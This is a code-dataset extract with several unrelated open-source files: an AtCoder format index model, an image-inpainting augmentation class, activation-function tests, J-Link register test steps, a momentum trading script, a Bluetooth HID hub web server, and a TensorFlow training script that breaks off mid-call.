max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
atcodertools/fmtprediction/models/index.py
|
come2ry/atcoder-tools
| 313 |
102260
|
from atcodertools.fmtprediction.models.calculator import CalcNode
class Index:
"""
    The model to store index information of a variable: the likely minimal / maximal value for each dimension.
Up to 2 indices are now supported.
In most cases, the minimal value is 1 and the maximal value is some variable like N.
"""
def __init__(self):
self.min_index = None
self.max_index = None
def update(self, new_value: str):
self._update_min(new_value)
self._update_max(new_value)
def get_length(self):
assert self.max_index is not None
assert self.min_index is not None
return CalcNode.parse(
"{max_index}-({min_index})+1".format(
max_index=self.max_index,
min_index=self.min_index)
).simplify()
def _update_min(self, new_value: str):
if not new_value.isdecimal():
            # A non-decimal token is a variable, which is not assumed to be the minimal value, so skip it.
return
if (self.min_index is None) or (self.min_index.evaluate() > CalcNode.parse(new_value).evaluate()):
self.min_index = CalcNode.parse(new_value)
def _update_max(self, new_value: str):
if not new_value.isdecimal():
self.max_index = CalcNode.parse(new_value)
if (self.max_index is None) or (
len(self.max_index.get_all_variables()) == 0 and self.max_index.evaluate() < CalcNode.parse(
new_value).evaluate()
):
self.max_index = CalcNode.parse(new_value)
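# Hypothetical usage sketch (not part of atcoder-tools): Index is fed raw index tokens from a
# parsed input format; a decimal token can tighten the minimum, any other token (e.g. "N") is
# taken as the maximum, and get_length() builds "max-(min)+1" as a simplified CalcNode.
if __name__ == "__main__":
    example = Index()
    example.update("1")             # literal lower bound
    example.update("N")             # symbolic upper bound
    length = example.get_length()   # CalcNode for "N-(1)+1", simplified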
|
saicinpainting/training/modules/fake_fakes.py
|
BishmoyPaul/lama
| 2,133 |
102310
|
<reponame>BishmoyPaul/lama<gh_stars>1000+
import torch
from kornia import SamplePadding
from kornia.augmentation import RandomAffine, CenterCrop
class FakeFakesGenerator:
def __init__(self, aug_proba=0.5, img_aug_degree=30, img_aug_translate=0.2):
self.grad_aug = RandomAffine(degrees=360,
translate=0.2,
padding_mode=SamplePadding.REFLECTION,
keepdim=False,
p=1)
self.img_aug = RandomAffine(degrees=img_aug_degree,
translate=img_aug_translate,
padding_mode=SamplePadding.REFLECTION,
keepdim=True,
p=1)
self.aug_proba = aug_proba
def __call__(self, input_images, masks):
blend_masks = self._fill_masks_with_gradient(masks)
blend_target = self._make_blend_target(input_images)
result = input_images * (1 - blend_masks) + blend_target * blend_masks
return result, blend_masks
def _make_blend_target(self, input_images):
batch_size = input_images.shape[0]
permuted = input_images[torch.randperm(batch_size)]
augmented = self.img_aug(input_images)
is_aug = (torch.rand(batch_size, device=input_images.device)[:, None, None, None] < self.aug_proba).float()
result = augmented * is_aug + permuted * (1 - is_aug)
return result
def _fill_masks_with_gradient(self, masks):
batch_size, _, height, width = masks.shape
grad = torch.linspace(0, 1, steps=width * 2, device=masks.device, dtype=masks.dtype) \
.view(1, 1, 1, -1).expand(batch_size, 1, height * 2, width * 2)
grad = self.grad_aug(grad)
grad = CenterCrop((height, width))(grad)
grad *= masks
grad_for_min = grad + (1 - masks) * 10
grad -= grad_for_min.view(batch_size, -1).min(-1).values[:, None, None, None]
grad /= grad.view(batch_size, -1).max(-1).values[:, None, None, None] + 1e-6
grad.clamp_(min=0, max=1)
return grad
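# Hypothetical usage sketch (not part of LaMa), assuming the kornia version this module was
# written against: blend a dummy image batch with gradient-filled masks and check shapes.
if __name__ == "__main__":
    generator = FakeFakesGenerator(aug_proba=0.5)
    dummy_images = torch.rand(4, 3, 64, 64)                  # (batch, channels, H, W)
    dummy_masks = (torch.rand(4, 1, 64, 64) > 0.5).float()   # binary inpainting masks
    fake_fakes, blend_masks = generator(dummy_images, dummy_masks)
    print(fake_fakes.shape, blend_masks.shape)               # (4, 3, 64, 64) and (4, 1, 64, 64)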
|
reference/NumpyDL-master/tests/test_activaton.py
|
code4bw/deep-np
| 186 |
102338
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from npdl import activations
def test_activation():
from npdl.activations import Activation
act = Activation()
with pytest.raises(NotImplementedError):
act.forward((10, 10))
with pytest.raises(NotImplementedError):
act.derivative()
assert str(act) == 'Activation'
def test_get():
with pytest.raises(ValueError):
activations.get(1)
with pytest.raises(ValueError):
activations.get('l')
class TestActivations(object):
@pytest.mark.parametrize('activation',
['sigmoid',
'tanh',
'relu',
'linear',
'softmax',
'elliot',
'SymmetricElliot',
'SoftPlus',
'SoftSign'])
def test_activation(self, activation):
input = np.arange(24).reshape((4, 6))
npdl_act = activations.get(activation)
        if activation == 'sigmoid':
            f_res = npdl_act.forward(input)
            assert np.all((0. <= f_res) & (f_res <= 1.))
            assert npdl_act.derivative().shape == input.shape
        elif activation == 'tanh':
            f_res = npdl_act.forward(input)
            assert np.all((-1. <= f_res) & (f_res <= 1.))
            assert npdl_act.derivative().shape == input.shape
        elif activation == 'relu':
            f_res = npdl_act.forward(input)
            assert np.all(f_res >= 0.)
            assert npdl_act.derivative().shape == input.shape
            assert np.all(npdl_act.derivative() <= 1.)
        elif activation == 'linear':
            f_res = npdl_act.forward(input)
            assert np.allclose(f_res, input)
            assert npdl_act.derivative().shape == input.shape
            assert np.all(npdl_act.derivative() == 1.)
        elif activation == 'softmax':
            f_res = npdl_act.forward(input)
            assert np.all((0. <= f_res) & (f_res <= 1.))
            assert npdl_act.derivative().shape == input.shape
            assert np.all(npdl_act.derivative() == 1.)
elif activation == 'elliot':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SymmetricElliot':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SoftPlus':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SoftSign':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
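# Hypothetical usage sketch (not part of the NumpyDL test suite): the same lookup-by-name API
# exercised above, used directly outside of pytest.
if __name__ == "__main__":
    act = activations.get('relu')
    out = act.forward(np.array([[-1.0, 0.0, 2.0]]))   # -> [[0., 0., 2.]]
    grad = act.derivative()                           # derivative at the last forward pass
    print(out, grad)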
|
tests/functional/features/steps/registers.py
|
dia38/pylink
| 217 |
102350
|
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import behave
@behave.when('I write {value} to ICE register {register}')
def step_write_to_ice_register(context, value, register):
"""Writes a value to a single ICE register.
Args:
context (Context): the ``Context`` instance
value (str): the value to write to the register
register (str): the register to write to
Returns:
``None``
"""
jlink = context.jlink
register = int(register, 0)
value = int(value, 0)
jlink.ice_register_write(register, value)
@behave.when('I write {value} to register {register}')
def step_write_to_register(context, value, register):
"""Writes a value to a single register.
Args:
context (Context): the ``Context`` instance
value (str): the value to write to the register
register (str): the register to write to
Returns:
``None``
"""
jlink = context.jlink
jlink.register_write(int(register), int(value))
@behave.when('I write to the registers')
def step_write_to_registers(context):
"""Writes multiple values to multiple registers.
The values and registers are loaded from the context's table.
Args:
context (Context): the ``Context`` instance
Returns:
``None``
"""
jlink = context.jlink
registers, values = [], []
for row in context.table:
registers.append(int(row['register']))
values.append(int(row['value']))
jlink.register_write_multiple(registers, values)
@behave.then('ICE register {register} should have the value {value}')
def step_ice_register_has_value(context, register, value):
"""Checks that an ICE register has a particular value.
Args:
context (Context): the ``Context`` instance
register (str): the ICE register to read from
value (str): the value the ICE register should have
Returns:
``None``
"""
jlink = context.jlink
register = int(register, 0)
expected = int(value, 0)
assert jlink.ice_register_read(register) == expected
@behave.then('register {register} should have the value {value}')
def step_register_has_value(context, register, value):
"""Reads a single value from a single register and asserts equality.
Args:
      context (Context): the ``Context`` instance
      register (str): the register to read from
      value (str): the value the register should have
Returns:
``None``
"""
jlink = context.jlink
actual = jlink.register_read(int(register))
assert actual == int(value)
@behave.then('I should read from the registers')
def step_registers_have_values(context):
"""Reads multiple values from multiple registers and asserts equality.
Args:
context (Context): the ``Context`` instance
Returns:
``None``
"""
jlink = context.jlink
registers, expected_values = [], []
for row in context.table:
registers.append(int(row['register']))
expected_values.append(int(row['value']))
assert expected_values == jlink.register_read_multiple(registers)
|
Chapter4/ch4_naive_momentum_strategy2.py
|
buiksat/Learn-Algorithmic-Trading
| 449 |
102369
|
<filename>Chapter4/ch4_naive_momentum_strategy2.py
#!/bin/python3
import pandas as pd
import numpy as np
from pandas_datareader import data
import matplotlib.pyplot as plt
def load_financial_data(start_date, end_date,output_file):
try:
df = pd.read_pickle(output_file)
print('File data found...reading GOOG data')
except FileNotFoundError:
print('File not found...downloading the GOOG data')
df = data.DataReader('GOOG', 'yahoo', start_date, end_date)
df.to_pickle(output_file)
return df
goog_data=load_financial_data(start_date='2001-01-01',
end_date = '2018-01-01',
output_file='goog_data.pkl')
def naive_momentum_trading(financial_data, nb_conseq_days):
signals = pd.DataFrame(index=financial_data.index)
signals['orders'] = 0
cons_day=0
prior_price=0
init=True
for k in range(len(financial_data['Adj Close'])):
price=financial_data['Adj Close'][k]
if init:
prior_price=price
init=False
elif price>prior_price:
if cons_day<0:
cons_day=0
cons_day+=1
elif price<prior_price:
if cons_day>0:
cons_day=0
cons_day-=1
if cons_day==nb_conseq_days:
signals['orders'][k]=1
elif cons_day == -nb_conseq_days:
signals['orders'][k]=-1
return signals
ts=naive_momentum_trading(goog_data, 5)
fig = plt.figure()
ax1 = fig.add_subplot(111, ylabel='Google price in $')
goog_data["Adj Close"].plot(ax=ax1, color='g', lw=.5)
ax1.plot(ts.loc[ts.orders== 1.0].index,
goog_data["Adj Close"][ts.orders == 1],
'^', markersize=7, color='k')
ax1.plot(ts.loc[ts.orders== -1.0].index,
goog_data["Adj Close"][ts.orders == -1],
'v', markersize=7, color='k')
plt.legend(["Price","Buy","Sell"])
plt.title("Naive Momentum Trading Strategy")
plt.show()
import sys
sys.exit(0)
|
web.py
|
Dreamsorcerer/bthidhub
| 166 |
102377
|
<reponame>Dreamsorcerer/bthidhub
# Copyright (c) 2020 ruundii. All rights reserved.
from aiohttp import web,WSMessage
from password import *
import json
from hid_devices import *
from bluetooth_devices import *
import asyncio
import concurrent.futures
import sys
import subprocess
from aiohttp_session import SimpleCookieStorage, session_middleware
from aiohttp_security import check_authorized, \
is_anonymous, authorized_userid, remember, forget, \
setup as setup_security, SessionIdentityPolicy
from aiohttp_security.abc import AbstractAuthorizationPolicy
PI_USER = 'pi'
class PiAuthorizationPolicy(AbstractAuthorizationPolicy):
async def authorized_userid(self, identity):
"""Retrieve authorized user id.
Return the user_id of the user identified by the identity
or 'None' if no user exists related to the identity.
"""
if identity == PI_USER:
return identity
async def permits(self, identity, permission, context=None):
"""Check user permissions.
Return True if the identity is allowed the permission
in the current context, else return False.
"""
return identity == PI_USER
class Web:
def __init__(self, loop: asyncio.AbstractEventLoop, adapter, bluetooth_devices:BluetoothDeviceRegistry, hid_devices: HIDDeviceRegistry):
self.loop = loop
self.adapter = adapter
self.adapter.set_on_agent_action_handler(self.on_agent_action)
self.adapter.set_on_interface_changed_handler(self.on_adapter_interface_changed)
self.hid_devices = hid_devices
self.hid_devices.set_on_devices_changed_handler(self.on_hid_devices_change)
self.bluetooth_devices = bluetooth_devices
self.bluetooth_devices.set_on_devices_changed_handler(self.on_bluetooth_devices_change)
middleware = session_middleware(SimpleCookieStorage())
self.app = web.Application(middlewares=[middleware])
self.app.router.add_route('*', '/', self.root_handler)
self.app.router.add_route('POST', '/changepassword', self.change_password_handler)
self.app.router.add_route('POST', '/restartservice', self.restart_service_handler)
self.app.router.add_route('POST', '/reboot', self.reboot_handler)
self.app.router.add_route('POST', '/login', self.handler_login)
self.app.router.add_route('GET', '/authorised', self.handler_is_authorised)
self.app.router.add_route('POST', '/setdevicecapture', self.set_device_capture)
self.app.router.add_route('POST', '/setdevicefilter', self.set_device_filter)
self.app.router.add_route('POST', '/setcompatibilitydevice', self.set_compatibility_device)
self.app.router.add_route('POST', '/startscanning', self.start_scanning)
self.app.router.add_route('POST', '/stopscanning', self.stop_scanning)
self.app.router.add_route('POST', '/startdiscoverable', self.start_discoverable)
self.app.router.add_route('POST', '/stopdiscoverable', self.stop_discoverable)
self.app.router.add_route('GET', '/hiddevices', self.get_hid_devices_handler)
self.app.router.add_route('GET', '/bluetoothdevices', self.get_bluetooth_devices)
self.app.router.add_routes([web.get('/ws', self.websocket_handler)])
self.app.router.add_static('/',"web/")# add_routes([web.get('/', self.hello)])
policy = SessionIdentityPolicy()
setup_security(self.app, policy, PiAuthorizationPolicy())
self.runner = None
self.site = None
self.ws = []
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=3)
#web.run_app(self.app)
asyncio.run_coroutine_threadsafe(self.start_server(), loop=self.loop)
async def handler_login(self, request):
data = await request.post()
password = data['password']
if(is_valid_current_password(PI_USER, password)):
redirect_response = web.HTTPFound('/')
await remember(request, redirect_response, PI_USER)
raise redirect_response
else:
raise web.HTTPUnauthorized()
async def handler_is_authorised(self, request):
await check_authorized(request)
return web.Response()
async def on_hid_devices_change(self):
for ws in self.ws:
await ws.send_json({'msg': 'hid_devices_updated'})
async def on_bluetooth_devices_change(self):
for ws in self.ws:
await ws.send_json({'msg': 'bt_devices_updated'})
async def start_server(self):
self.runner = web.AppRunner(self.app)
await self.runner.setup()
self.site = web.TCPSite(self.runner, None, 8080)
await self.site.start()
async def root_handler(self, request):
return web.HTTPFound('/index.html')
async def change_password_handler(self, request):
await check_authorized(request)
data = await request.post()
current_password = data['<PASSWORD>']
new_password = data['<PASSWORD>']
if not is_valid_current_password(PI_USER, current_password):
return web.HTTPUnauthorized()
if not set_new_password(PI_USER, new_password):
            return web.HTTPInternalServerError()
return web.Response(text="Password successfully changed")
async def restart_service_handler(self, request):
await check_authorized(request)
sys.exit(1)
async def reboot_handler(self, request):
await check_authorized(request)
subprocess.Popen(['reboot'])
async def get_hid_devices_handler(self, request):
await check_authorized(request)
return web.Response(text=json.dumps(self.hid_devices.get_hid_devices_with_config()))
async def set_device_capture(self, request):
await check_authorized(request)
data = await request.post()
device_id = data['device_id']
capture_state = data['capture'].lower() == 'true'
self.hid_devices.set_device_capture(device_id, capture_state)
return web.Response()
async def set_device_filter(self, request):
await check_authorized(request)
data = await request.post()
device_id = data['device_id']
filter = data['filter']
self.hid_devices.set_device_filter(device_id, filter)
return web.Response()
async def set_compatibility_device(self, request):
await check_authorized(request)
data = await request.post()
device_path = data['device_path']
compatibility_state = data['compatibility_state'].lower() == 'true'
self.hid_devices.set_compatibility_device(device_path, compatibility_state)
return web.Response()
async def start_scanning(self, request):
await check_authorized(request)
try:
self.adapter.start_scan()
except Exception as exc:
            return web.HTTPInternalServerError(reason=str(exc))
return web.Response()
async def stop_scanning(self, request):
await check_authorized(request)
try:
self.adapter.stop_scan()
except Exception as exc:
            return web.HTTPInternalServerError(reason=str(exc))
return web.Response()
async def start_discoverable(self, request):
await check_authorized(request)
try:
self.adapter.start_discoverable()
except Exception as exc:
            return web.HTTPInternalServerError(reason=str(exc))
return web.Response()
async def stop_discoverable(self, request):
await check_authorized(request)
try:
self.adapter.stop_discoverable()
except Exception as exc:
            return web.HTTPInternalServerError(reason=str(exc))
return web.Response()
async def get_bluetooth_devices(self, request):
await check_authorized(request)
return web.Response(text=json.dumps(self.adapter.get_devices()))
async def on_agent_action(self, msg):
for ws in self.ws:
asyncio.run_coroutine_threadsafe(ws.send_json({'msg': 'agent_action', 'data':msg}), loop=self.loop)
async def on_adapter_interface_changed(self):
for ws in self.ws:
asyncio.run_coroutine_threadsafe(ws.send_json({'msg': 'bt_devices_updated'}), loop=self.loop)
async def websocket_handler(self, request):
await check_authorized(request)
ws = web.WebSocketResponse()
await ws.prepare(request)
async for msg in ws:
if msg.type == web.WSMsgType.TEXT:
data = json.loads(msg.data)
if 'msg' in data:
if data['msg'] == 'close' or data['msg'] == 'shutdown':
self.ws.remove(ws)
await ws.close()
elif data['msg'] == 'connect':
self.ws.append(ws)
await ws.send_json({'msg':'connected'})
print('websocket connection opened')
elif data['msg'] == 'cancel_pairing':
self.adapter.cancel_pairing(data['device'])
elif data['msg'] == 'request_confirmation_response':
self.adapter.agent_request_confirmation_response(data['device'], data['passkey'], data['confirmed'])
elif data['msg'] == 'pair_device':
print("pairing")
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'pair', data['device'])
print("pairing end")
elif data['msg'] == 'connect_device':
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'connect', data['device'])
elif data['msg'] == 'disconnect_device':
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'disconnect', data['device'])
elif data['msg'] == 'remove_device':
self.loop.run_in_executor(self.executor, self.adapter.remove_device, data['device'])
else:
pass
#await ws.send_json({'msg':'connected'})
elif msg.type == web.WSMsgType.ERROR:
print('ws connection closed with exception %s' %
ws.exception())
print('websocket connection closed')
return ws
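# Hypothetical client sketch (not part of bthidhub): exercises the websocket protocol handled
# above, assuming the hub is reachable on localhost:8080; 'your-password' is a placeholder and
# the session cookie issued by /login authorises the /ws upgrade.
if __name__ == "__main__":
    import aiohttp

    async def _watch_updates():
        async with aiohttp.ClientSession() as session:
            await session.post('http://localhost:8080/login', data={'password': 'your-password'})
            async with session.ws_connect('http://localhost:8080/ws') as client_ws:
                await client_ws.send_json({'msg': 'connect'})
                async for message in client_ws:
                    print(message.json())   # {'msg': 'connected'}, then update notifications

    asyncio.run(_watch_updates())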
|
src/main/python/train_esitmator_distributed.py
|
moony320/shifu
| 200 |
102403
|
<filename>src/main/python/train_esitmator_distributed.py
# -*- coding: utf-8 -*-
# Copyright [2012-2018] PayPal Software Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Python TensorFlow NN training; users can change the TF DAG to customize the NN used for training. Models are saved in the
# same 'models' folder as regular models and are evaluated in the distributed Shifu eval step.
#
import shutil
import argparse
from tensorflow.python.platform import gfile
import gzip
from StringIO import StringIO
import random
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
import tensorflow as tf
import numpy as np
import sys
import os
import datetime
SHIFU_CONTEXT = {}
def get_activation_fun(name):
if name == None:
return tf.nn.leaky_relu
name = name.lower()
if 'sigmoid' == name:
return tf.nn.sigmoid
elif 'tanh' == name:
return tf.nn.tanh
elif 'relu' == name:
return tf.nn.relu
elif 'leakyrelu' == name:
return tf.nn.leaky_relu
else:
return tf.nn.leaky_relu
def get_loss_func(name):
if name == None:
return tf.metrics.mean_squared_error
name = name.lower()
if 'squared' == name:
return tf.metrics.mean_squared_error
elif 'absolute' == name:
return tf.metrics.mean_absolute_error
elif 'log' == name:
# No log error, we use root error here
return tf.metrics.root_mean_squared_error
else:
return tf.metrics.mean_squared_error
def get_optimizer(name):
if name == None:
return tf.train.AdamOptimizer
name = name.lower()
if 'adam' == name:
return tf.train.AdamOptimizer
    elif 'gradientdescent' == name:
        return tf.train.GradientDescentOptimizer
    elif 'rmsprop' == name:
        return tf.train.RMSPropOptimizer
else:
return tf.train.AdamOptimizer
def get_initalizer(name):
if 'gaussian' == name:
return tf.initializers.random_normal()
elif 'xavier' == name:
return tf.contrib.layers.xavier_initializer()
else:
return tf.contrib.layers.xavier_initializer()
def export_generic_config(export_dir):
config_json_str = ""
config_json_str += "{\n"
config_json_str += " \"inputnames\": [\n"
config_json_str += " \"shifu_input_0\"\n"
config_json_str += " ],\n"
config_json_str += " \"properties\": {\n"
config_json_str += " \"algorithm\": \"tensorflow\",\n"
config_json_str += " \"tags\": [\"serve\"],\n"
config_json_str += " \"outputnames\": \"shifu_output_0\",\n"
config_json_str += " \"normtype\": \"ZSCALE\"\n"
config_json_str += " }\n"
config_json_str += "}"
f = file(export_dir + "/" + "GenericModelConfig.json", mode="w+")
f.write(config_json_str)
def remove_path(path):
if not os.path.exists(path):
return
if os.path.isfile(path) and os.path.exists(path):
os.remove(path)
return
files = os.listdir(path)
for f in files:
remove_path(path + "/" + f)
os.removedirs(path)
def load_data(context):
train_data = []
train_target = []
valid_data = []
valid_target = []
training_data_sample_weight = []
valid_data_sample_weight = []
count = 0
train_pos_cnt = 0
train_neg_cnt = 0
valid_pos_cnt = 0
valid_neg_cnt = 0
feature_column_nums = context["feature_column_nums"]
sample_weight_column_num = context["sample_weight_column_num"]
delimiter = context["delimiter"]
allFileNames = gfile.ListDirectory(root)
normFileNames = filter(lambda x: not x.startswith(".") and not x.startswith("_"), allFileNames)
print(normFileNames)
print("Total input file count is " + str(len(normFileNames)) + ".")
sys.stdout.flush()
file_count = 1
line_count = 0
for normFileName in normFileNames:
print("Now loading " + normFileName + " Progress: " + str(file_count) + "/" + str(len(normFileNames)) + ".")
sys.stdout.flush()
file_count += 1
with gfile.Open(root + '/' + normFileName, 'rb') as f:
gf = gzip.GzipFile(fileobj=StringIO(f.read()))
while True:
line = gf.readline()
if len(line) == 0:
break
line_count += 1
if line_count % 10000 == 0:
print("Total loading lines cnt: " + str(line_count))
sys.stdout.flush()
columns = line.split(delimiter)
if feature_column_nums == None:
feature_column_nums = range(0, len(columns))
feature_column_nums.remove(target_index)
if random.random() >= valid_data_percentage:
# Append training data
train_target.append([float(columns[target_index])])
if(columns[target_index] == "1"):
train_pos_cnt += 1
else :
train_neg_cnt += 1
single_train_data = []
for feature_column_num in feature_column_nums:
single_train_data.append(float(columns[feature_column_num].strip('\n')))
train_data.append(single_train_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
print("Warning: weight is below 0. example:" + line)
weight= 1.0
training_data_sample_weight.append([weight])
else:
training_data_sample_weight.append([1.0])
else:
# Append validation data
valid_target.append([float(columns[target_index])])
if(columns[target_index] == "1"):
valid_pos_cnt += 1
else:
valid_neg_cnt += 1
single_valid_data = []
for feature_column_num in feature_column_nums:
single_valid_data.append(float(columns[feature_column_num].strip('\n')))
valid_data.append(single_valid_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
print("Warning: weight is below 0. example:" + line)
weight= 1.0
valid_data_sample_weight.append([weight])
else:
valid_data_sample_weight.append([1.0])
print("Total data count: " + str(line_count) + ".")
print("Train pos count: " + str(train_pos_cnt) + ".")
print("Train neg count: " + str(train_neg_cnt) + ".")
print("Valid pos count: " + str(valid_pos_cnt) + ".")
print("Valid neg count: " + str(valid_neg_cnt) + ".")
sys.stdout.flush()
context['feature_count'] = len(feature_column_nums)
return train_data, train_target, valid_data, valid_target, training_data_sample_weight, valid_data_sample_weight
def serving_input_receiver_fn():
global SHIFU_CONTEXT
inputs = {
'input_feature': tf.placeholder(tf.float32, [None, SHIFU_CONTEXT["feature_count"]], name='shifu_input_0')
}
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
def dnn_model_fn(features, labels, mode, params):
shifu_context = params.shifu_context
layers = shifu_context["layers"]
learning_rate = shifu_context["learning_rate"]
loss_func = shifu_context["loss_func"]
optimizer_name = shifu_context["optimizer"]
weight_initalizer = shifu_context["weight_initalizer"]
act_funcs = shifu_context["act_funcs"]
#print(labels)
#sys.stdout.flush()
input_layer = tf.convert_to_tensor(features['input_feature'], dtype=tf.float32)
#sample_weight = tf.convert_to_tensor(features['sample_weight'], dtype=tf.float32)
# Start define model structure
model = [input_layer]
current_layer = input_layer
for i in range(len(layers)):
node_num = layers[i]
current_layer = tf.layers.dense(inputs=current_layer, units=node_num, activation=get_activation_fun(act_funcs[i]), kernel_initializer=get_initalizer(weight_initalizer))
model.append(current_layer)
logits = tf.layers.dense(inputs=current_layer, units=1)
prediction = tf.nn.sigmoid(logits, name="shifu_output_0")
def _train_op_fn(loss):
"""Returns the op to optimize the loss."""
optimizer = get_optimizer(optimizer_name)(learning_rate=learning_rate)
# Create training operation
train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())
return train_op
head = tf.contrib.estimator.regression_head(
label_dimension=1,
name='regression_head',
loss_reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS,
loss_fn=get_loss_func(loss_func),
weight_column='sample_weight'
)
return head.create_estimator_spec(
features,
mode,
prediction,
labels=labels,
train_op_fn=_train_op_fn
)
def metric_fn(labels, predictions, features, config):
metrics = {}
pred_values = predictions['predictions']
global SHIFU_CONTEXT
metrics["average_loss"] = get_loss_func(SHIFU_CONTEXT["loss_func"])(labels, pred_values, weights=features['sample_weight'])
return metrics
def create_estimator(run_config, hparams):
estimator = tf.estimator.Estimator(
model_fn=dnn_model_fn,
config=run_config,
params=hparams
)
estimator = tf.contrib.estimator.add_metrics(estimator, metric_fn)
return estimator
if __name__ == "__main__":
print("Training input arguments: " + str(sys.argv))
print(tf.__version__)
sys.stdout.flush()
    # Parse command-line arguments
parser = argparse.ArgumentParser("Shifu_tensorflow_training")
parser.add_argument("-inputdaatapath", action='store', dest='inputdaatapath', help="data path used for training",
type=str)
parser.add_argument("-delimiter", action='store', dest='delimiter',
help="delimiter of data file to seperate columns", type=str)
parser.add_argument("-target", action='store', dest='target', help="target index in training data file", type=int)
parser.add_argument("-validationrate", action='store', dest='validationrate', default=0.2, help="validation rate",
type=float)
parser.add_argument("-hiddenlayernodes", action='store', dest='hiddenlayernodes', help="NN hidden layer nodes",
nargs='+',type=int)
parser.add_argument("-epochnums", action='store', dest='epochnums', help="", type=int)
parser.add_argument("-checkppointinterval", action='store', dest='checkpointinterval', default=0, help="", type=int)
parser.add_argument("-modelname", action='store', dest='modelname', default="model0", help="", type=str)
parser.add_argument("-seletectedcolumnnums", action='store', dest='selectedcolumns', help="selected columns list",
nargs='+', type=int)
parser.add_argument("-weightcolumnnum", action='store', dest='weightcolumnnum', help="Sample Weight column num", type=int)
parser.add_argument("-learningRate", action='store', dest='learningRate', help="Learning rate of NN", type=float)
parser.add_argument("-lossfunc", action='store', dest='lossfunc', help="Loss functions", type=str)
parser.add_argument("-optimizer", action='store', dest='optimizer', help="optimizer functions", type=str)
parser.add_argument("-weightinitalizer", action='store', dest='weightinitalizer', help="weightinitalizer functions", type=str)
parser.add_argument("-actfuncs", action='store', dest='actfuncs', help="act funcs of each hidden layers",
nargs='+',type=str)
parser.add_argument("-minibatch", action='store', dest='minibatch', help="batch size of each iteration", type=int)
args, unknown = parser.parse_known_args()
root = args.inputdaatapath
target_index = args.target
hidden_layers = args.hiddenlayernodes
feature_column_nums = args.selectedcolumns
valid_data_percentage = args.validationrate
model_name = args.modelname
delimiter = args.delimiter.replace('\\', "")
sample_weight_column_num = args.weightcolumnnum
learning_rate = args.learningRate
loss_func = args.lossfunc
optimizer = args.optimizer
weight_initalizer = args.weightinitalizer
act_funcs = args.actfuncs
batch_size = args.minibatch
RESUME_TRAINING = False
    # Make SHIFU_CONTEXT global so that metric_fn can read it
global SHIFU_CONTEXT
SHIFU_CONTEXT["feature_column_nums"] = feature_column_nums
SHIFU_CONTEXT["layers"] = hidden_layers
SHIFU_CONTEXT["batch_size"] = batch_size
SHIFU_CONTEXT["export_dir"] = "./models"
SHIFU_CONTEXT["epoch"] = args.epochnums
SHIFU_CONTEXT["model_name"] = model_name
SHIFU_CONTEXT["checkpoint_interval"] = args.checkpointinterval
SHIFU_CONTEXT["sample_weight_column_num"] = sample_weight_column_num
SHIFU_CONTEXT["learning_rate"] = learning_rate
SHIFU_CONTEXT["loss_func"] = loss_func
SHIFU_CONTEXT["optimizer"] = optimizer
SHIFU_CONTEXT["weight_initalizer"] = weight_initalizer
SHIFU_CONTEXT["act_funcs"] = act_funcs
SHIFU_CONTEXT["delimiter"] = delimiter
if not os.path.exists("./models"):
os.makedirs("./models", 0777)
input_features, targets, validate_feature, validate_target, training_data_sample_weight, valid_data_sample_weight = load_data(SHIFU_CONTEXT)
# Train the model
SHIFU_CONTEXT["total_steps"] = (len(input_features)/SHIFU_CONTEXT['batch_size'])*SHIFU_CONTEXT['epoch']
export_dir = SHIFU_CONTEXT["export_dir"] + "/" + SHIFU_CONTEXT["model_name"]
hparams = tf.contrib.training.HParams(shifu_context=SHIFU_CONTEXT)
run_config = tf.estimator.RunConfig(tf_random_seed=19830610, model_dir=export_dir)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(input_features, dtype=np.float32), 'sample_weight': np.asarray(training_data_sample_weight, dtype=np.float32)},
y=np.asarray(targets, dtype=np.float32),
batch_size=SHIFU_CONTEXT["batch_size"],
num_epochs=SHIFU_CONTEXT['epoch'],
shuffle=False)
train_spec = tf.estimator.TrainSpec(input_fn = train_input_fn, max_steps=SHIFU_CONTEXT["total_steps"])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(validate_feature, dtype=np.float32), 'sample_weight': np.asarray(valid_data_sample_weight, dtype=np.float32)},
y=np.asarray(validate_target, dtype=np.float32),
batch_size=SHIFU_CONTEXT["batch_size"],
num_epochs=1,
